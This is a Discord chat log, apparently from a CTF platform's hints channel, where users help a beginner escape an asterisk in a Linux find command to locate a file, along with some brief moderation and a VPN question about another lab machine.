There are others

Yes I’m sure.

it now gave me like 300 different results

how do I know which one to use?

It tells you the exact name

The * isn’t a regex thing it’s in the name of the file

really?

Truly

Mr President

how do I use find and add * to the name then without 500 results showing up?

if u could tell me it would be a huge help

You could use a regex with a literal *

smh all tutorials saying to abide the law

https://regex101.com/

thanks man

Use that link to try stuff out and find out how to do a regex with special characters

Safe for work.@wind fog

oh, will do

https://tenor.com/view/professional-level-expert-pro-gamer-prindi-gif-15236011

@white salmon If you don't like it, this isn't the place for you. Rule 9 applies.

smh

I was joking

sure sure

tell that to the judge 🤨

🧐

😭

😉

https://tenor.com/view/bye-slide-baby-later-peace-out-gif-12999722

As I am the presidente I will

Smith

Hey guys, let's not make jokes like that

Not even remotely ok

Also, this is a hints channel...

yeah sorry

we were just jokin around

Thank you

No worries

If you would, please remove that joke regarding minorities

Thank you!

what a silly guy

:D

🥶

For joking around, please move to general ❤️

is the first part of jigsaw even doable over VPN? Cos I am buggered if I can capture what I am supposed to?

If it's FTP related, use an EU VPN server

no its about it leaking a udp packet with some info in, I got so frustrated trying to get something out of the machine I ended up looking at a write up for the first piece... but I cannot replicate either of the potential routes the arp routes I am not surprised by but .... nmap and a wireshark capture just doesnt do what they say it does but all three are vulnhub write ups

i.e. no vpn at all

hey peeps, I've found a file which I'm pretty sure I was meant to find, but am not sure what to do with it now, I've tried executing it, catting it, and I haven't got a clue what I'm meant to do with it.

the room is linuxctf btw, question 3, task 5.

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

dang it

lol

Linux CTF, priv esc ^

this seems new ^^^

Have you tried running it

wdym?

./request ?

Yes...

yep, told me permission denied

Have you checked your sudo permissions

sudo -l

but I haven't got access to the sudo

anything else I could try doing with the file, cause right now I'm lost

I guess you could try reversing it but check the room tags see if that helps.

I don't want to lead you in a wrong direction so I'll wait for someone else to come help.

reversing it? I'm quite new, so im not really sure what that means

I have not completed the room so me saying anything is virtually useless.

ah

thats a beginner room, therell be no RE in it

Exactly why I said whatever I say is virtually useless ^

linux challenges? @wind fog

yep

linuxctf

Oh it's linux challenges

yeah, what did you think it was?

:0

weren't you asking about that earlier?

Linux CTF is the machine name not the room name.

oh

the hint tells you the name of the file

youre going down an unintended rabbit hole

yeah, *request

its not a track question, you should ||find the file called *release||

no

look at the hint again

you misread it

i ran a find command for *release but didn't find one

then your find command wasn't good enough

you need to look at how to find something with a special character in the name, cuz the * is messing it up

doesn't the \ cancel it out?

not sure, make a file called *requestt and see if that finds it

yep, it found it

I've been on this for over an hour now so at this point I'm quite desperate for answers

It doesn't say request, does it.

It says release

true true, now it's giving me 300 results for release

so im assuming my find command is wrong somehow

You're probably not escaping the character correctly at my guess

find / -name *release 2>>/dev/null

is this wrong??! please tell me, I am sick and tired of this question by now

In the cmmand you just sent

😭

you're not escaping it

you just showed a good command earlier about how to escape a special character

why did you get rid of the escaping

find / -name *release 2>/dev/null

find / -name \*release 2>>/dev/null

Oh it's DIscord markdown

find / -name \*release 2>/dev/null

i added it to discord, it just erased it

so it that right then?

Try this

Single quotes are magic

James -_-

Backticks are magic in discord

so '*'release